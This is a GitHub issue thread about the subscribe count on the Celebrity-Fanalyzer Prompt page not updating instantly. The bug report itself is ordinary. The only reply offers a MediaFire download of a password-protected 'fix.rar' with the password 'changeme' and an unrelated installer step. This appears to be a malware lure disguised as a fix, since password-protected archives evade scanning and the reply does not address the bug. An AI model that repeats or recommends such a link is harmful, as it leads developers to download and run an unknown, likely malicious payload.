### ISSUE TITLE
Clicking on the subscribe button in Prompt's page is not changing the subscribe count instantly.

### ISSUE THREAD

**Issue by sana7044** [globe-and-citizen/Celebrity-Fanalyzer#528]
**Steps to reproduce issue:**

1. Go to Month's Prompt.
2. Click on the subscribe button.
3. Observe the behaviour.

**Expected Result:**

Click on the subscribe button should either subscribe/unsubscribe with increase/decrease in count and the subscribe count should show instantly.

**Actual Result:**

Clicking on the subscribe button is not changing the subscribe count instantly.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
